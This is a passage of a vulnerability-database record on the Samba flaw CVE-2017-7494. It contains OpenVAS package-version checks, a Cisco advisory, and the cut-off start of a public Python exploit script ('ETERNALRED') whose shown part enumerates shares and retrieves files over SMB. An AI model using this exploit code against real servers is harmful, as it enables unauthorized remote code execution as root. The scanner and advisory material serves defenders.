"2019-05-29T18:34:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "description": "Check the version of samba4", "modified": "2019-03-08T00:00:00", "published": "2017-05-26T00:00:00", "id": "OPENVAS:1361412562310882724", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882724", "type": "openvas", "title": "CentOS Update for samba4 CESA-2017:1271 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for samba4 CESA-2017:1271 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public 
License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882724\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-26 06:32:10 +0200 (Fri, 26 May 2017)\");\n script_cve_id(\"CVE-2017-7494\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for samba4 CESA-2017:1271 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of samba4\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of\n the Server Message Block (SMB) or Common Internet File System (CIFS) protocol,\n which allows PC-compatible machines to share files, printers, and other\n information. Security Fix(es): * A remote code execution flaw was found in\n Samba. A malicious authenticated samba client, having write access to the samba\n share, could use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n Red Hat would like to thank the Samba project for reporting this issue. 
Upstream\n acknowledges steelo as the original reporter.\");\n script_tag(name:\"affected\", value:\"samba4 on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:1271\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-May/022418.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.2.10~10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-client\", rpm:\"samba4-client~4.2.10~10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-common\", rpm:\"samba4-common~4.2.10~10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc\", rpm:\"samba4-dc~4.2.10~10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc-libs\", rpm:\"samba4-dc-libs~4.2.10~10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-devel\", rpm:\"samba4-devel~4.2.10~10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-libs\", rpm:\"samba4-libs~4.2.10~10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-pidl\", rpm:\"samba4-pidl~4.2.10~10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-python\", rpm:\"samba4-python~4.2.10~10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-test\", rpm:\"samba4-test~4.2.10~10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind\", rpm:\"samba4-winbind~4.2.10~10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-clients\", rpm:\"samba4-winbind-clients~4.2.10~10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-krb5-locator\", rpm:\"samba4-winbind-krb5-locator~4.2.10~10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "description": "Check the version of ctdb", "modified": "2019-03-08T00:00:00", "published": "2017-05-26T00:00:00", "id": "OPENVAS:1361412562310882723", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882723", "type": "openvas", "title": "CentOS Update for ctdb CESA-2017:1270 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for ctdb CESA-2017:1270 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public 
License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882723\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-26 06:32:07 +0200 (Fri, 26 May 2017)\");\n script_cve_id(\"CVE-2017-7494\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for ctdb CESA-2017:1270 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of ctdb\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of\n the Server Message Block (SMB) protocol and the related Common Internet File\n System (CIFS) protocol, which allow PC-compatible machines to share files,\n printers, and various information. Security Fix(es): * A remote code execution\n flaw was found in Samba. A malicious authenticated samba client, having write\n access to the samba share, could use this flaw to execute arbitrary code as\n root. (CVE-2017-7494) Red Hat would like to thank the Samba project for\n reporting this issue. 
Upstream acknowledges steelo as the original reporter.\");\n script_tag(name:\"affected\", value:\"ctdb on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:1270\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-May/022420.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"ctdb\", rpm:\"ctdb~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ctdb-tests\", rpm:\"ctdb-tests~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient\", rpm:\"libwbclient~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-libs\", rpm:\"samba-client-libs~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common-libs\", rpm:\"samba-common-libs~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common-tools\", rpm:\"samba-common-tools~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-dc\", rpm:\"samba-dc~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-dc-libs\", rpm:\"samba-dc-libs~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-devel\", rpm:\"samba-devel~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-krb5-printing\", rpm:\"samba-krb5-printing~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-libs\", rpm:\"samba-libs~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-pidl\", rpm:\"samba-pidl~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-python\", rpm:\"samba-python~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if 
((res = isrpmvuln(pkg:\"samba-test\", rpm:\"samba-test~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-test-libs\", rpm:\"samba-test-libs~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-vfs-glusterfs\", rpm:\"samba-vfs-glusterfs~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-krb5-locator\", rpm:\"samba-winbind-krb5-locator~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-modules\", rpm:\"samba-winbind-modules~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisco": [{"lastseen": "2019-05-29T15:32:20", "bulletinFamily": "software", "cvelist": ["CVE-2017-7494"], "description": "A vulnerability in Samba could allow an authenticated, remote attacker to execute arbitrary code.\n\nThe vulnerability is due to insufficient validation of user-supplied input by the affected software. An attacker who has access to a writable share on a targeted system could upload malicious, shared libraries to the writable share. 
When the targeted system loads and executes the malicious, shared libraries, the attacker could execute arbitrary code, which could be used to conduct further attacks.\n\nOn May 24, 2017, the Samba team disclosed a vulnerability in Samba server software that could allow an authenticated attacker to execute arbitrary code remotely on a targeted system.\n\nThis vulnerability has been assigned CVE ID CVE-2017-7494\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170530-samba [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170530-samba\"]", "modified": "2017-07-11T13:47:34", "published": "2017-05-30T19:30:00", "id": "CISCO-SA-20170530-SAMBA", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170530-samba", "type": "cisco", "title": "Vulnerability in Samba Affecting Cisco Products: May 2017", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2017-05-25T20:39:53", "description": "Samba 3.5.0 - Remote Code Execution. CVE-2017-7494. Remote exploit for Linux platform", "published": "2017-05-24T00:00:00", "type": "exploitdb", "title": "Samba 3.5.0 - Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-24T00:00:00", "id": "EDB-ID:42060", "href": "https://www.exploit-db.com/exploits/42060/", "sourceData": "#! 
/usr/bin/env python\r\n# Title : ETERNALRED \r\n# Date: 05/24/2017\r\n# Exploit Author: steelo <knownsteelo@gmail.com>\r\n# Vendor Homepage: https://www.samba.org\r\n# Samba 3.5.0 - 4.5.4/4.5.10/4.4.14\r\n# CVE-2017-7494\r\n\r\n\r\nimport argparse\r\nimport os.path\r\nimport sys\r\nimport tempfile\r\nimport time\r\nfrom smb.SMBConnection import SMBConnection\r\nfrom smb import smb_structs\r\nfrom smb.base import _PendingRequest\r\nfrom smb.smb2_structs import *\r\nfrom smb.base import *\r\n\r\n\r\nclass SharedDevice2(SharedDevice):\r\n def __init__(self, type, name, comments, path, password):\r\n super().__init__(type, name, comments)\r\n self.path = path\r\n self.password = password\r\n\r\nclass SMBConnectionEx(SMBConnection):\r\n def __init__(self, username, password, my_name, remote_name, domain=\"\", use_ntlm_v2=True, sign_options=2, is_direct_tcp=False):\r\n super().__init__(username, password, my_name, remote_name, domain, use_ntlm_v2, sign_options, is_direct_tcp)\r\n\r\n\r\n def hook_listShares(self):\r\n self._listShares = self.listSharesEx\r\n\r\n def hook_retrieveFile(self):\r\n self._retrieveFileFromOffset = self._retrieveFileFromOffset_SMB1Unix\r\n\r\n # This is maily the original listShares but request a higher level of info\r\n def listSharesEx(self, callback, errback, timeout = 30):\r\n if not self.has_authenticated:\r\n raise NotReadyError('SMB connection not authenticated')\r\n\r\n expiry_time = time.time() + timeout\r\n path = 'IPC$'\r\n messages_history = [ ]\r\n\r\n def connectSrvSvc(tid):\r\n m = SMB2Message(SMB2CreateRequest('srvsvc',\r\n file_attributes = 0,\r\n access_mask = FILE_READ_DATA | FILE_WRITE_DATA | FILE_APPEND_DATA | FILE_READ_EA | FILE_WRITE_EA | READ_CONTROL | FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES | SYNCHRONIZE,\r\n share_access = FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\r\n oplock = SMB2_OPLOCK_LEVEL_NONE,\r\n impersonation = SEC_IMPERSONATE,\r\n create_options = FILE_NON_DIRECTORY_FILE | 
FILE_OPEN_NO_RECALL,\r\n create_disp = FILE_OPEN))\r\n\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, connectSrvSvcCB, errback)\r\n messages_history.append(m)\r\n\r\n def connectSrvSvcCB(create_message, **kwargs):\r\n messages_history.append(create_message)\r\n if create_message.status == 0:\r\n call_id = self._getNextRPCCallID()\r\n # The data_bytes are binding call to Server Service RPC using DCE v1.1 RPC over SMB. See [MS-SRVS] and [C706]\r\n # If you wish to understand the meanings of the byte stream, I would suggest you use a recent version of WireShark to packet capture the stream\r\n data_bytes = \\\r\n binascii.unhexlify(b\"\"\"05 00 0b 03 10 00 00 00 74 00 00 00\"\"\".replace(b' ', b'')) + \\\r\n struct.pack('<I', call_id) + \\\r\n binascii.unhexlify(b\"\"\"\r\nb8 10 b8 10 00 00 00 00 02 00 00 00 00 00 01 00\r\nc8 4f 32 4b 70 16 d3 01 12 78 5a 47 bf 6e e1 88\r\n03 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00\r\n2b 10 48 60 02 00 00 00 01 00 01 00 c8 4f 32 4b\r\n70 16 d3 01 12 78 5a 47 bf 6e e1 88 03 00 00 00\r\n2c 1c b7 6c 12 98 40 45 03 00 00 00 00 00 00 00\r\n01 00 00 00\r\n\"\"\".replace(b' ', b'').replace(b'\\n', b''))\r\n m = SMB2Message(SMB2WriteRequest(create_message.payload.fid, data_bytes, 0))\r\n m.tid = create_message.tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, rpcBindCB, errback, fid = create_message.payload.fid)\r\n messages_history.append(m)\r\n else:\r\n errback(OperationFailure('Failed to list shares: Unable to locate Server Service RPC endpoint', messages_history))\r\n\r\n def rpcBindCB(trans_message, **kwargs):\r\n messages_history.append(trans_message)\r\n if trans_message.status == 0:\r\n m = SMB2Message(SMB2ReadRequest(kwargs['fid'], read_len = 1024, read_offset = 0))\r\n m.tid = trans_message.tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, rpcReadCB, 
errback, fid = kwargs['fid'])\r\n messages_history.append(m)\r\n else:\r\n closeFid(trans_message.tid, kwargs['fid'], error = 'Failed to list shares: Unable to read from Server Service RPC endpoint')\r\n\r\n def rpcReadCB(read_message, **kwargs):\r\n messages_history.append(read_message)\r\n if read_message.status == 0:\r\n call_id = self._getNextRPCCallID()\r\n\r\n padding = b''\r\n remote_name = '\\\\\\\\' + self.remote_name\r\n server_len = len(remote_name) + 1\r\n server_bytes_len = server_len * 2\r\n if server_len % 2 != 0:\r\n padding = b'\\0\\0'\r\n server_bytes_len += 2\r\n\r\n # The data bytes are the RPC call to NetrShareEnum (Opnum 15) at Server Service RPC.\r\n # If you wish to understand the meanings of the byte stream, I would suggest you use a recent version of WireShark to packet capture the stream\r\n data_bytes = \\\r\n binascii.unhexlify(b\"\"\"05 00 00 03 10 00 00 00\"\"\".replace(b' ', b'')) + \\\r\n struct.pack('<HHI', 72+server_bytes_len, 0, call_id) + \\\r\n binascii.unhexlify(b\"\"\"4c 00 00 00 00 00 0f 00 00 00 02 00\"\"\".replace(b' ', b'')) + \\\r\n struct.pack('<III', server_len, 0, server_len) + \\\r\n (remote_name + '\\0').encode('UTF-16LE') + padding + \\\r\n binascii.unhexlify(b\"\"\"\r\n02 00 00 00 02 00 00 00 04 00 02 00 00 00 00 00\r\n00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00\r\n\"\"\".replace(b' ', b'').replace(b'\\n', b''))\r\n m = SMB2Message(SMB2IoctlRequest(kwargs['fid'], 0x0011C017, flags = 0x01, max_out_size = 8196, in_data = data_bytes))\r\n m.tid = read_message.tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, listShareResultsCB, errback, fid = kwargs['fid'])\r\n messages_history.append(m)\r\n else:\r\n closeFid(read_message.tid, kwargs['fid'], error = 'Failed to list shares: Unable to bind to Server Service RPC endpoint')\r\n\r\n def listShareResultsCB(result_message, **kwargs):\r\n messages_history.append(result_message)\r\n if result_message.status == 0:\r\n # 
The payload.data_bytes will contain the results of the RPC call to NetrShareEnum (Opnum 15) at Server Service RPC.\r\n data_bytes = result_message.payload.out_data\r\n\r\n if data_bytes[3] & 0x02 == 0:\r\n sendReadRequest(result_message.tid, kwargs['fid'], data_bytes)\r\n else:\r\n decodeResults(result_message.tid, kwargs['fid'], data_bytes)\r\n elif result_message.status == 0x0103: # STATUS_PENDING\r\n self.pending_requests[result_message.mid] = _PendingRequest(result_message.mid, expiry_time, listShareResultsCB, errback, fid = kwargs['fid'])\r\n else:\r\n closeFid(result_message.tid, kwargs['fid'])\r\n errback(OperationFailure('Failed to list shares: Unable to retrieve shared device list', messages_history))\r\n\r\n def decodeResults(tid, fid, data_bytes):\r\n shares_count = struct.unpack('<I', data_bytes[36:40])[0]\r\n results = [ ] # A list of SharedDevice2 instances\r\n offset = 36 + 52 # You need to study the byte stream to understand the meaning of these constants\r\n for i in range(0, shares_count):\r\n results.append(SharedDevice(struct.unpack('<I', data_bytes[offset+4:offset+8])[0], None, None))\r\n offset += 12\r\n\r\n for i in range(0, shares_count):\r\n max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])\r\n offset += 12\r\n results[i].name = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')\r\n\r\n if length % 2 != 0:\r\n offset += (length * 2 + 2)\r\n else:\r\n offset += (length * 2)\r\n\r\n max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])\r\n offset += 12\r\n results[i].comments = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')\r\n\r\n if length % 2 != 0:\r\n offset += (length * 2 + 2)\r\n else:\r\n offset += (length * 2)\r\n\r\n max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])\r\n offset += 12\r\n results[i].path = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')\r\n\r\n if length % 2 != 0:\r\n offset += (length * 2 + 2)\r\n else:\r\n offset += 
(length * 2)\r\n\r\n max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])\r\n offset += 12\r\n results[i].password = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')\r\n\r\n if length % 2 != 0:\r\n offset += (length * 2 + 2)\r\n else:\r\n offset += (length * 2)\r\n\r\n\r\n closeFid(tid, fid)\r\n callback(results)\r\n\r\n def sendReadRequest(tid, fid, data_bytes):\r\n read_count = min(4280, self.max_read_size)\r\n m = SMB2Message(SMB2ReadRequest(fid, 0, read_count))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, readCB, errback,\r\n fid = fid, data_bytes = data_bytes)\r\n\r\n def readCB(read_message, **kwargs):\r\n messages_history.append(read_message)\r\n if read_message.status == 0:\r\n data_len = read_message.payload.data_length\r\n data_bytes = read_message.payload.data\r\n\r\n if data_bytes[3] & 0x02 == 0:\r\n sendReadRequest(read_message.tid, kwargs['fid'], kwargs['data_bytes'] + data_bytes[24:data_len-24])\r\n else:\r\n decodeResults(read_message.tid, kwargs['fid'], kwargs['data_bytes'] + data_bytes[24:data_len-24])\r\n else:\r\n closeFid(read_message.tid, kwargs['fid'])\r\n errback(OperationFailure('Failed to list shares: Unable to retrieve shared device list', messages_history))\r\n\r\n def closeFid(tid, fid, results = None, error = None):\r\n m = SMB2Message(SMB2CloseRequest(fid))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, closeCB, errback, results = results, error = error)\r\n messages_history.append(m)\r\n\r\n def closeCB(close_message, **kwargs):\r\n if kwargs['results'] is not None:\r\n callback(kwargs['results'])\r\n elif kwargs['error'] is not None:\r\n errback(OperationFailure(kwargs['error'], messages_history))\r\n\r\n if path not in self.connected_trees:\r\n def connectCB(connect_message, **kwargs):\r\n messages_history.append(connect_message)\r\n if 
connect_message.status == 0:\r\n self.connected_trees[path] = connect_message.tid\r\n connectSrvSvc(connect_message.tid)\r\n else:\r\n errback(OperationFailure('Failed to list shares: Unable to connect to IPC$', messages_history))\r\n\r\n m = SMB2Message(SMB2TreeConnectRequest(r'\\\\%s\\%s' % ( self.remote_name.upper(), path )))\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, connectCB, errback, path = path)\r\n messages_history.append(m)\r\n else:\r\n connectSrvSvc(self.connected_trees[path])\r\n\r\n\r\n # Don't convert to Window style path\r\n def _retrieveFileFromOffset_SMB1Unix(self, service_name, path, file_obj, callback, errback, starting_offset, max_length, timeout = 30):\r\n if not self.has_authenticated:\r\n raise NotReadyError('SMB connection not authenticated')\r\n\r\n messages_history = [ ]\r\n\r\n\r\n def sendOpen(tid):\r\n m = SMBMessage(ComOpenAndxRequest(filename = path,\r\n access_mode = 0x0040, # Sharing mode: Deny nothing to others\r\n open_mode = 0x0001, # Failed if file does not exist\r\n search_attributes = SMB_FILE_ATTRIBUTE_HIDDEN | SMB_FILE_ATTRIBUTE_SYSTEM,\r\n timeout = timeout * 1000))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, openCB, errback)\r\n messages_history.append(m)\r\n\r\n def openCB(open_message, **kwargs):\r\n messages_history.append(open_message)\r\n if not open_message.status.hasError:\r\n if max_length == 0:\r\n closeFid(open_message.tid, open_message.payload.fid)\r\n callback(( file_obj, open_message.payload.file_attributes, 0 ))\r\n else:\r\n sendRead(open_message.tid, open_message.payload.fid, starting_offset, open_message.payload.file_attributes, 0, max_length)\r\n else:\r\n errback(OperationFailure('Failed to retrieve %s on %s: Unable to open file' % ( path, service_name ), messages_history))\r\n\r\n def sendRead(tid, fid, offset, file_attributes, read_len, remaining_len):\r\n 
read_count = self.max_raw_size - 2\r\n m = SMBMessage(ComReadAndxRequest(fid = fid,\r\n offset = offset,\r\n max_return_bytes_count = read_count,\r\n min_return_bytes_count = min(0xFFFF, read_count)))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, readCB, errback, fid = fid, offset = offset, file_attributes = file_attributes,\r\n read_len = read_len, remaining_len = remaining_len)\r\n\r\n def readCB(read_message, **kwargs):\r\n # To avoid crazy memory usage when retrieving large files, we do not save every read_message in messages_history.\r\n if not read_message.status.hasError:\r\n read_len = kwargs['read_len']\r\n remaining_len = kwargs['remaining_len']\r\n data_len = read_message.payload.data_length\r\n if max_length > 0:\r\n if data_len > remaining_len:\r\n file_obj.write(read_message.payload.data[:remaining_len])\r\n read_len += remaining_len\r\n remaining_len = 0\r\n else:\r\n file_obj.write(read_message.payload.data)\r\n remaining_len -= data_len\r\n read_len += data_len\r\n else:\r\n file_obj.write(read_message.payload.data)\r\n read_len += data_len\r\n\r\n if (max_length > 0 and remaining_len <= 0) or data_len < (self.max_raw_size - 2):\r\n closeFid(read_message.tid, kwargs['fid'])\r\n callback(( file_obj, kwargs['file_attributes'], read_len )) # Note that this is a tuple of 3-elements\r\n else:\r\n sendRead(read_message.tid, kwargs['fid'], 